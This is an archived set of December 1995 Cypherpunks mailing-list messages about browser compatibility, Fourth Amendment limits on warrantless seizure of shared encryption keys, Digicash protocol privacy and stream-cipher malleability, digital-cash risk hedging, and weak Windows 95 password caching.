Thought for the day.  Bill on the relevance of the briefing being held on
Pearl Harbor day quoted Admiral Yamamoto after the 1941 attack, "we have
awoken a sleeping giant."  Draw your own conclusions on that one...

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Thu, 7 Dec 95 02:06:11 PST
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: FW: websurfer 4.6 (fwd)
In-Reply-To: <Pine.SUN.3.91.951202115438.2073D-100000@viper.law.miami.edu>
Message-ID: <Pine.LNX.3.91.951207174345.8504B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Michael Froomkin wrote:

> so much for compatibility....guess I'm sticking with netscape for now.

These guys at Netmanage's support seem to confuse Trumpet's version number
with the Winsock version... Trumpet 2.0b (as, AFAIK, any other Winsock
package presently available) is Winsock 1.1 compliant. 

By the way, I read in the "about/more" screen of Websurfer 4.6 (that 
works with my Win95 TCP/IP stack):

-------- 8< -------------------
Cryptography developed and
provided by Cylink Corporation
http://www.cylink.com
Portions copyrighted 1995
-------- 8< -------------------

and on the right side of the URL field a little (open) lock icon is shown. 
However, I haven't found anywhere references to secure connections. Does 
anybody know more about it? For sure, "https:" URL are not recognized.

Enzo

______________________________________________________________________

> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | 
> U. Miami School of Law     | froomkin@law.miami.edu
> P.O. Box 248087            | http://www.law.miami.edu/~froomkin
> Coral Gables, FL 33124 USA | It's warm here.
> 
> ---------- Forwarded message ----------
> Date: Fri, 1 Dec 95 16:49:34 PST
> >From: Netmanage Technical Support <Support@netmanage.com>
> To: Michael Froomkin <froomkin@law.miami.edu>
> Subject: FW: websurfer 4.6 
> 
> 
> Hello,
> 
> Thank you for emailing NetManage Technical Support. WebSurfer 4.6 was
> designed to work on Winsock 1.1 compliant systems. Since you are
> running Winsock version 2.0 this may be the reason for the
> application not working. We will report this to Engineering so
> hopefully in a future release WebSurfer might be able to support
> this new Winsock version.
> 
> Thank you for considering Chameleon WebSurfer,
> 
> Support@netmange.com
> ==
> [earlier, I had said:]
> 
> won't start on my pentium 100 w/ 20Mb running qemm 7.04, windows 3.11, 
> winsock 2.0 rev B on a novell 3.x LAN.
> 
> Netscape runs fine.
> 
> This might help:
> Trumpet Winsock Version 2.0 Revision B
> Copyright (c) 1993,1994 by Peter R. Tattam
> All Rights Reserved.
> THIS IS AN UNREGISTERED SHAREWARE VERSION FOR EVALUATION ONLY.
> Ethernet address = 00:00:F4:D2:64:D3
> WINPKT packet driver located on vector $66
> IP buffers = 32
> Performing bootp...Bootp successful
> My IP = 129.171.188.92 netmask = 255.255.255.0 gateway = 129.171.188.1
> Task WEBSURF(22E7) did not call WSACleanup.
> Task WEBSURF(38EF) did not call WSACleanup.
> 
> 
> -----------------End of Original Message-----------------
> 
> If responding to a previous message please include the original for our reference. To ensure a faster  reply be sure to reply to 'support@netmanage.com' and not to individual sender of 
> messages.
> 
> --         /\ 
> **********/@@\ *********************************
>           \__/      NetManage Inc.
>        W   AA   W   Home of Chameleon TCPIP for Windows
>        |__AYA__/    TCPIP Apps for Windows and NT
>          AXXV          
>          VXXV          
>       W  VUV   W      Technical Support  (408)973-8181
>       |_/ V \_/ __        Fax (408)973-8272 
>            \   [_ \             
>             \_____/    MIME enclosures are OK 
>                               gopher server: gopher.netmanage.com
> 	             www:   http:/www.netmanage.com
>                    
> For a list of current NetManage products use WebSurfer and go to:     http://www.netmanage.com:80/netmanage/products/upgrade.html
> 
> Serendipity
> 11/20/95
> 10:36:42 AM
> 
> This message was sent by Chameleon 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 7 Dec 95 18:31:50 PST
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.SUN.3.91.951207202351.6540B-100000@polaris.mindport.net>
Message-ID: <199512080227.SAA15534@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > You mean if you give me your key the police can get it from me without a
> > warrant? What if I don't want to give it up, and you don't? How would the
> > police get it without a warrant?
> 
> Yes.  Unless it could be shown there their was an expactation of privacy 
> in the transfer, or that there was an understanding that you intended this 
> to be a confidential matter.  Or in the alternative, that the 

	I do not understand.

Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
Bob "I want Alice's key, you need to give it to me. I don't have a
warrant."

How is this different from
Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key,
you need to give it to me. I don't have a warrant."


	sheesh, what a fucked up legal system.
-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 7 Dec 95 18:48:39 PST
To: cypherpunks@toad.com
Subject: Anyone Remember socket.c?
Message-ID: <199512080248.SAA29014@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Fellow 'Punks,

A while back on the list, someone posted a very short C
program called socket.c, which, when given a port number
and an excutable, would fork off copies of a given
application for anyone who connected to the port. 

I saved the program at the time, but seem to have
deleted it.  I realize it would be trivial to write, 
but don't want to have to look at nasty network 
#include files. 

If someone could either post it to the list again, or
email me a copy, I will be eternally greatful. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 7 Dec 95 15:47:33 PST
To: cme@acm.org
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <9512072127.AA28756@tis.com>
Message-ID: <Pine.SUN.3.91.951207184258.1146D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995 cme@acm.org wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >Date: Sat, 2 Dec 1995 03:39:00 -0500 (EST)
> >From: Black Unicorn <unicorn@polaris.mindport.net>
> >Subject: Re: Netscape gives in to key escrow
> 
> >An individual has no legitimate expectation of privacy in the encryption 
> >numbers in his GAK browser, we reasoned, because he voluntarily conveyed 
> >those numbers to the government when he purchased the software.
> 
> It could be even worse.  I was on a panel last year with Scott Charney (sp?)
> (I believe from DoJ) during which he commented that if you give your secret
> key to anyone -- e.g., your own company -- then you have given up the
> presumption of privacy.  That leaves the police open to get that secret
> without a warrant.

Uh, you managed to delete the part of my message that said precisely this 
- i.e. that conveying information to a third party with which you have 
no expectation of confidentiality estopps you from later claiming said 
information as a protected interest under the fourth amendment.

You also deleted the citation to the case.  They aren't my words, they 
are those of the supreme court.  (The GAK bit was my extrapolation of the 
concept into the realm of key forfeiture)

> This claim should be checked by a real lawyer.

I am a real lawyer.

> +--------------------------------------------------------------------------+
> |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
> |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
> |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
> +---------------------------------------------- Jean Ellison (aka Mother) -+
> -----BEGIN PGP SIGNATURE-----
[...]
> -----END PGP SIGNATURE-----

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 7 Dec 95 18:46:52 PST
To: Alice <na455120@anon.penet.fi>
Subject: Re: [FYI] FBI Training Eastern European Police
Message-ID: <v03003f0bacec4fbd23a7@[129.46.82.94]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:22 PM 12/6/95, anonymous-remailer@shell.portal.com wrote:
[elided]
>I'm certain that the FBI and other law-enforcement officials might
>also learn by living in a city where the East truly meets the West.
>
>Budapest is a beautiful old city of bridges, not just literally but
>figuratively.  It's where anyone in the world can find comfort.
[much elided]

Hey "Alice,"

This is a very persipicatious set of observations about Budapest, a city I
lived/worked in for a while (you sound like you know it rather well
yourself). The level of technical CS knowledge in Bp is comparable to, or
better than, many other cities (except maybe for Moscow and St. Petersburg)
in the former Bloc. Your comments also provide good insights into why it's
technically and geographically important to cypherpunks: it's the petri
disk for many of our cpunk brethren over there.

The fact that the FBI has chosen Bp as one of their entry-points into the
region impacts our policy discussions here, particularly since our LE types
are making contact with the former secret police in that region, and
especially so given the stationing of US Troops in Kaposvar as we type
(southern Hungary) for easy entry into Bosnia. Anyone who attended CFP 95
may also remember some of Esther Dyson's lunchtime comments about the
Russian mafia (which has a strong presence in Bp) and the growth of
crypto's use both by the gangsters and LE officers. Some of the most
powerful crypto may be emanating from these regions and it would be wise
for us to try and track TLA activities in that area.

I won't drag this topic out any further, but if anyone comes across similar
info about our various TLAs operations over there, I hope they'll at least
share it with me, if not the list.

   dave

PS: I hope Perry's paying attention. ;)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Thu, 7 Dec 95 08:51:19 PST
To: cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
In-Reply-To: <199512071601.IAA23556@blob.best.net>
Message-ID: <Pine.SOL.3.91.951207183747.7445B-100000@sun.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, James A. Donald wrote:

> At 10:06 AM 12/7/95 -0500, Duncan Frissell wrote:
> > Is there an existing Post Office Bank in Sweden?  If so, can foreigners open
> > accounts? 
> 
> I would wait for some more solvent foreign country to get into digicash.

What about Estonia :) The taxes are low, there are a very few government 
regulations, the currency is very stable (based on German mark) ... One 
interesting law in Estonia is that the state budget must be balanced, so 
there is no way for the government to spend more money than it really has.

Technological level here is also quite good, and Internet is more popular
than in any other Eastern Europe or ex-USSR country. 

I think Estonia is an ideal place for such projects: high-tech companies 
testing their new technological ideas, inventions and business 
assumptions in real-life conditions. Just get yourself here !

Juri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 7 Dec 95 10:55:04 PST
To: Mark Twain Ecash Support <support@marktwain.com>
Subject: Re: Still more on the Digicash protocol
Message-ID: <Pine.3.89.9512071804.A21520-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Mark Twain Ecash Support wrote:

> >Anyhow, the obvious solution is encryption.  Our new observation is
> >that encrypting deposits & cancellations with the mint's public key
> >is not enough to solve the problem.
> [Argument in support of claim elided... I am not conviced.]

I think he means you shouldn't use a stream cipher like RC4 that XORs the
plaintext with the generated keystream, since if you know part of the
plaintext, you can XOR those bytes with (the id you want) XOR (the id
being sent) and change the encrypted data so that the payment goes into
your account and not theirs. This is a tough, but potentially feasible
attack if you use that kind of encryption scheme. 

Is there anywhere that you could use a similar attack on SSL ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 7 Dec 95 18:43:12 PST
To: cypherpunks@toad.com
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on El
In-Reply-To: <kklpxbOMc50e1DgT9u@nsb.fv.com>
Message-ID: <H7kRFD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein <nsb@nsb.fv.com> writes:
> Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. "E.
> ALLEN SMITH"@mbcl.ru (1656)
>
> > 	The risk in question is not infinite-cost. If the person who gets
> > ahold of the keys starts simply making lots and lots of money, in a free
> > market the prices in digital cash for everything will start going up. This
> > phenomenon will be spotted, and those taking the particular variety in
> > question will stop accepting it. Losses are limited to however much was out
> > there at a given time, and if there are multiple systems with free-market
> > interconversion between them, that may not be very much. People will move
> > out of a decaying monetary system if: A. the new system is as easy to get
> > as the old; and B. the new system is as easy to spend as the old.
> > 	If the person who gets the keys simply uses them on a small scale,
> > then the resulting inflation and loss of value can simply be dealt with
> > using the discount mechanism. It's no longer infinite risk.
>
> Basically, the criminal in this scenario has a choice between greed and
> vandalism.  If he's motivated by greed, and he's clever, he'll push
> things slowly in the inflationary direction, as you describe.  If he's a
> vandal or terrorist at heart, however, he might get more satisfaction
> out of generating the equivalent of overnight inflation at the
> billion-percent level.  That's not a decaying monetary system, it's a
> suddenly-collapsing monetary system.   The only difference between those
> two scenarios is the quantity of bad money the criminal chooses to print
> and distribute.  (Note that this is very different from physical
> counterfeiting, where the logistics of actually feeding trillions of
> dollars into the money supply are quite daunting, and make the
> catastrophic-vandal scenario more or less impossible.)

A few rambling thoughts on the same subject:

I see a couple of risks that a potential customer would consider (akin to the
risks of owning a real-world exotic currency):

1. The risk that she'll accumulate some electronic money and won't be able to
exchange it conveniently for something else (goods, services, other forms of
money).

Imagine holding a quanitity of central-african francs or belarusian zaichiks in
a rural area in American Midwest. This currency may be worth a lot in some
geographical areas (like New York City), but no bank will take it in the
accursed fly-over :). (Someone I know brought back some sheqels from a trip to
Israel and had lots of trouble finding a bank willing to exchange those for US
dollars.) Likewise if your interner connection suddently goes under, you may
not be able to trade your electronic cash until it's restored.

2. The risk that the electronic money will lose its value, e.g., because
someone issues a lot of it. In real life, this is comparable to the situation
where you own, e.g., a pile Mexican pesos, and the government of Mexico decides
to print a lot of pesos, while changing the exchange rate so now you can get
more pesos for a dollar than you could when you got your original pile. Hence,
your pile is worth fewer dollars than it did before.

In real world, gold, silver, beads, fishhooks, whale teeth, whiskey, seashells,
cigarettes have all been used as money (medium of exchange / store of value)
because the users could be certain of their scarcity. There's the risk that
someone will find a way to forge electronic money so its exchange rate will
fall.

I see an entrepreneurial opportunity in these risks. I'm not necessarily going
to do it myself, but perhaps someone will find this idea useful.

First, let us recall how in real life currency owners limit their risks by
hedging. A most common hedge is an option. Let's suppose that I hold $1M worth
of DEMs, and can currently readily exchange them for USDs at, say, 1.40. I
enter into a contract with, say, my good friend Alexplore, specifying 2 things:

1. I now pay Alexplore $1,000 (Hey, I'm making this up!!!)
2. At any time during the next 3 months I can give Alexplore my DEM's and he'll
give me back USD's at, say, 1.35. (Of course, the contract specifies the
maximum amount of DEM's I can force him to buy from me.)

If the exchange rate never falls below 1.35 during the 3 months, I let the
option expire and Alexplore keeps the money; my loss of $1000 is his gain. If
the exchange rate does fall below 1.35, I'll probably excersice the option. My
loss is limited to the change from 1.40 to 1.45; any further loss is
Alexplore's (partially offset by the $1000). Alexplore is betting that the
exchange rate won't hit 1.35; I'm just limiting my potential losses.

In effect, Alexplore had sold me an insurance policy with a small deductible.
Another an example familiar to most people is insuring one's car or a house.
Suppose I own a house worth $200,000 (we actually don't) and buy a fire
insurance for $1000. If the house doesn't burn down within a year, the
insurance premium is my loss and the insurer's profit. If it does burn down,
I probably have a claim against the insurer.

Of course, there's an additional small risk that the insurance company will
go under or renege on the contract. Moreover, the insurer can insist that,
e.g., the house be inspected for fire code violations before the policy goes
into effect.

How then can this insurance of assets be emulated with electronic money? Well,
an individual or an organization X that's fairly confident that electronic
money is "safe" could offer offer the following contract: a money-holder Y pays
X an sum of real or electronic money. During a fixed period of time Y may
chooses to ask X to exchange some electronic money (up to a maximum amount
based on the initial payment) for real money at an agreed-upon discounted rate.

For example, Y might pay X $10 for the right to ask X to accept up to $1000 of
(dollar-denominated) electronic money at the rate of 90c of "real" money per
electronic dollar. The exchange rate is discounted so Y won't choose to
exercise the option until there's a real problem with the money (a deductible
of sorts); and the payment required to insure a certain amount of electronic
money is negotiated based on X's and Y's perceptions of the risks involved. If
electronic money works as well as many of us hope it will, then X just made $10
for nothing. But if the money goes bad, then X has assumed most of Y's risk.

X may impose security conditions on Y; e.g., only insure the money that was
received using an X-approved encryption.

For added assurance, X should be independent from the organizations that now
issue electronic money. X also has to convince Y's that he has the resources to
satisfy the claims if the shit hits the fan. Keep in mind that X assumes a
tremendous liability and hopes never to pay up. In the 80's many elderly
investors essentially insured others against a sharp drop in the market.
They were badly hurt during the crashes of 87 and 89.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@delhi.CS.Berkeley.EDU (David A Wagner)
Date: Thu, 7 Dec 95 16:17:58 PST
To: cypherpunks@toad.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512080017.TAA23185@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just a clarification about my comments on privacy against eavesdroppers
with Digicash.  I admit I didn't express myself very well the first time.

In article <199512071610.KAA16536@admin.starnet.net>,
Mark Twain Ecash Support <support@marktwain.com> wrote:
> 
> >Worse still, anonymity for the shop is worse with Digicash than with real
> >cash.  If I pay you real cash on a secluded street, you're fairly anonymous.
> >If I pay you Digicash over the Internet, any passive eavesdropper could be
> >recording your identy and the whole transaction.  Blech.
> 
> This is raising an issue that has nothing to do with Ecash. The complaint is
> in fact about the lack of a gereral link encryption on the Internet. I agree
> that this is needed, but providing it really isn't Ecash's job. I am eagerly
> anticipating the general use of IPSEC.
> 

Hrm, I think you misunderstood what I was trying to say.

Assume the attacker is not doing any traffic analysis.  The problem is
that even then, the shop's identity (and product info, and payment amount,
and bank ID, etc.) are still sent *in the clear* in the Digicash payment
protocol.  Thus all those items can be correlated to the payee's identity:
a complete loss of privacy for the shop.

There's no need to send that payment info in the clear -- why not encrypt?

If it is encrypted, a passive eavesdropper can only learn the payer's &
payee's identity if he uses traffic analysis, and even then he doesn't
know the payment amount, product description, etc.  For all he knows, the
transaction could've been a $0.01 cent donation to Sameer for his anonymous
remailer, or it could've been a $10,000 transfer to Sameer's machine in
(virtual) Anguila-space for a few dozen Apache servers.

(So this also has implications for payer anonymity & privacy, not just
payee privacy.  When payment info is sent in the clear, and the eavesdropper
is doing traffic analysis (e.g. by sniffing the link out from a small
business), the eavesdropper can correlate payer's identity with the
payment amount, product description, and other buying habit information.
When Digicash protocol messages are encrypted, this information isn't
released, and can't be correlated with payer identity, even when traffic
analysis is being done.)

That's why I really wish Digicash were encrypting all its messages.

And I'm very glad to hear that Digicash will support sending the entire
protocol over a SSL-protected link.  Great feature!  I'll be looking
forward to it.



> >* continue specifying the protocol at a deeper level, like you promised
> >  (and throw in source for security-critical modules too, eh? :-)
> 
> Writing all this down takes time. DigiCash may hire a tech writer soon. That
> should improve communications between all parties.

Excellent!

Thanks for all you're doing to improve Digicash's anonymity, privacy,
and security features, Lucky.  I think it's really important to get
this right in the pioneering work...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMeEBCoZzwIn1bdtAQFzYAF/agJtA7eal+rEP0ki34FY/vyKc/EDqJ0p
QR1T+zJZ0tn6i1hwluqlmvigJpWNst41
=/NJW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 7 Dec 95 19:31:26 PST
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Micro$oft and Java
In-Reply-To: <199512080205.SAA02898@mail.eskimo.com>
Message-ID: <Pine.ULT.3.91.951207190400.15814G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Joel McNamara wrote:

> I was at the Microsoft presentation.  Crypto-relevant info:
> 
> A patch will be published in the next few days to address the weak .PWL
> encryption.  I got a rather lame excuse about how the encryption was first
> implemented in 1991, and how it was sufficient then.  They will supposedly
> be changing the seed.

I do believe the word "lame" is in order, yes.

Microsoft has issued a public statement on the "issue" at 
http://www.microsoft.com/windows/pr/password.htm

As usual, the inaccuracies begin with the first sentence. Password caching
is not optional. It is on by default. Instructions for turning it off are
not even included with the floppy disk or OEM versions of Win95, and
they're not easy to find in the Resource Kit help file on the install CD,
which is neither installed nor referenced by default. 

Some rather astute people spent days looking for a way to disable password 
caching, and they couldn't find it. Their messages are on my list archive.

There is currently *no way* for the administrator of a public Windows 95 
lab to have any confidence that password caching has been turned off. All 
it takes is one malicious user -- or one innocent user who wants to 
disable system policies for other reasons -- and all passwords used from 
that machine are compromised.

We started whining about this on November 1; see 
gopher://quixote.stanford.edu/1m/win95netbugs.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 7 Dec 95 11:24:01 PST
To: cypherpunks@toad.com
Subject: Re: FW: websurfer 4.6
Message-ID: <199512071919.UAA12598@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On  7 Dec 95 at 18:06, Enzo Michelangeli wrote:

> On Sat, 2 Dec 1995, Michael Froomkin wrote:
> 
> > so much for compatibility....guess I'm sticking with netscape 
> > for now.
> 
> These guys at Netmanage's support seem to confuse Trumpet's 
> version number with the Winsock version... Trumpet 2.0b (as, 
> AFAIK, any other Winsock package presently available) is 
> Winsock 1.1 compliant. 

Not surprising. They confuse random doodling with software, too.

The real problem with NetManage is a severe case of brain death.
The Sampler TCP/IP sucks, the paid-up TCP/IP is so-so, but of 
the clients, only ftp is fair, and the rest bite. All the
NetManage clients I've tried crater, Mail can't rebuild its
index structures if they are corrupted (uh, what was it that 
rebuild was supposed to do, Harvey?), the version of WebSurfer
I evaluated took longer and longer to load and shut down, 
revealed on inspection to be due to loading/storing a very wordy 
global history in its, ahem, config file! Delete it and your 
config is gone. 

I wouldn't concern myself with what crypto is or isn't in a 
NetManage product -- they are not players as far as I'm 
concerned. They've been riding the wave of their TCP/IP not 
crashing as often as some others, but otherwise they're vacuum 
packed, untouched by coherent human thought.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Dec 95 19:17:54 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
Message-ID: <acecee610a021004a5f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 AM 12/8/95, sameer wrote:
>> > You mean if you give me your key the police can get it from me without a
>> > warrant? What if I don't want to give it up, and you don't? How would the
>> > police get it without a warrant?
>>
>> Yes.  Unless it could be shown there their was an expactation of privacy
>> in the transfer, or that there was an understanding that you intended this
>> to be a confidential matter.  Or in the alternative, that the
>
>        I do not understand.
>
>Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
>Bob "I want Alice's key, you need to give it to me. I don't have a
>warrant."
>
>How is this different from
>Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key,
>you need to give it to me. I don't have a warrant."
>
>
>        sheesh, what a fucked up legal system.
                        ^^^^^^^^^

EXON WARNING! This message has just exposed the author, the toad.com
system, and all those who pass it on to fines of not less than $10,000!

But I share Sameer's confusion. If cops show up at my door, they must, it
seems to me, present proper warrants before they can _enter_ my premises,
or _search_ my premises. Something given to me, whether a letter, a key, a
photo, etc., is essentially *my property* and may not simply be taken away
from without due process.

I hope Black Unicorn is incorrect in his point.

--Tim

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 7 Dec 95 17:48:04 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <acecb41c02021004f4ed@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951207204325.27209I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


If Alice gives Bob her key and Bob is not a person with whom Alice has a 
special relationship of trust (e.g. her lawyer), then Alice has no legal 
grounds to complain if Bob *voluntarily* gives Carol, a Cop, Alice's 
key.

If Alice gives Bob her key and Bob is not a person with whom Alice has a 
special relationship of trust (e.g. her lawyer), then Alice has no legal 
grounds to complain if Carol, a Cop, serves Bob with a valid warrant to 
seize Alice's key and in fact does so.  

Furthermore, there are circumstances in some states where even if there 
is a special relationship of trust Bob either may at his discretion or in 
some rarer cases may be forced to divulge the key.  E.g. to prevent a 
crime that is about to be committed likely to involve loss of life.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 7 Dec 95 20:54:05 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <199512080227.SAA15534@infinity.c2.org>
Message-ID: <30C7C407.4117@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Thu, 7 Dec 1995, sameer wrote:
> 
> > > > You mean if you give me your key the police can get it from me without a
> > > > warrant? What if I don't want to give it up, and you don't? How would the
> > > > police get it without a warrant?
> > >
> > > Yes.  Unless it could be shown there their was an expactation of privacy
> > > in the transfer, or that there was an understanding that you intended this
> > > to be a confidential matter.  Or in the alternative, that the
> >
> >       I do not understand.
> >
> > Alice has Alice gives Bob her key.  Cop wants Alice's key.  Cop tells
> > Bob "I want Alice's key, you need to give it to me. I don't have a
> > warrant."
> >
> > How is this different from
> > Bob has key. Cop want's Bob's key. Cop tells Bob "I want your key,
> > you need to give it to me. I don't have a warrant."
> 
> The real concern is this:
> 
> Bob gives his key to alice.
> 
> The cops walk into alice's place and 'convince' alice to turn the key
> over whithout a warant.  Perhaps alice is more susceptible to
> persuasion because of some external reasons.  Alice does, Bob has no privacy
> interest in the key, Bob can no longer argue that it is protected under
> the 4th amendment.
> 
> Now let's get more sinister.
> 
> The cops mysteriously 'find' the key somewhere without a warrant.
> Bob cannot argue that the key should be surpressed on the basis of the
> 4th amendment because he gave it to Alice, and thus clearly it's not
> information he was interested in protecting.  (This is assuming the cops
> didn't violate other areas, or break into a house or something, or that
> if they did, that the court will find out about it).

  How about if Bob had a contractual agreement with Alice to keep his
key secret?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 7 Dec 95 18:16:24 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <acecb41c02021004f4ed@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951207202351.6540B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Timothy C. May wrote:

> At 9:27 PM 12/7/95, cme@acm.org wrote:
> 
> >It could be even worse.  I was on a panel last year with Scott Charney (sp?)
> >(I believe from DoJ) during which he commented that if you give your secret
> >key to anyone -- e.g., your own company -- then you have given up the
> >presumption of privacy.  That leaves the police open to get that secret
> >without a warrant.  This claim should be checked by a real lawyer.
> 
> Huh?
> 
> You mean if you give me your key the police can get it from me without a
> warrant? What if I don't want to give it up, and you don't? How would the
> police get it without a warrant?

Yes.  Unless it could be shown there their was an expactation of privacy 
in the transfer, or that there was an understanding that you intended this 
to be a confidential matter.  Or in the alternative, that the 
relationship between you and the third party is suggestive of such a 
confidence on its face.  Remember this is a ex post ruling.  The police 
will just come in and take the information, you have to fight it AFTER 
the fact.  It sounds fine in e-mail to ask the question "How will they 
get in" but in real life it becomes a much less realistic proposition.
 
> (And "I" could be your employer, so the point is clear.)

Yes.  I have seen holdings which indicate that information given to an 
employer, where there was no obvious expection that it be kept 
confidential, estopped 4th amendment protections to its introduction when 
obtained without a warrant.

> And even more strikingly, what if you give your private key to your lawyer
> for safekeeping? Has attorney-client privilege gone away?

Hardly.  See above.  It hinges on the nature of the relationship and how 
it bears on the expectation of privacy.  The supreme court has ruled that 
the relationship with the phone company does not meet such a standard, 
and one can assume ISP's apply the same way.  I could go on spilling out 
holdings if there is enough interest.

> (Granted, there are ways to break attorney-client privilege, but these are
> rare exceptions. In any case, the police could not get the private key
> without a court order, warrant, whatever.)

Again, because of the nature of the relationship.  There is an 
expectation that a conversation with an attorney is one of the most 
private exchanges you can engage in.  As for rare exceptions, I'm not so 
sure I would term them rare.

> I can believe that some cases of giving up keys wipes out one's arguments
> based strictly on "privacy," but not that it wipes out other arguments.

It essentially prevents you from claiming you really had a demonstrated 
privacy interest in it, unless there are other circumstances to indicate 
such an interest.  Think of the court as saying "How the hell is this 
private if you told maggy and fred?"

> It seems to me that if one wants to voluntarily escrow private keys, for
> safekeeping, one's personal lawyer is a safe bet: it is very difficult to
> break this kind of attorney-client confidentiality, from what I know of
> such things.

I don't know where you came up with the lawyer example.  I don't know 
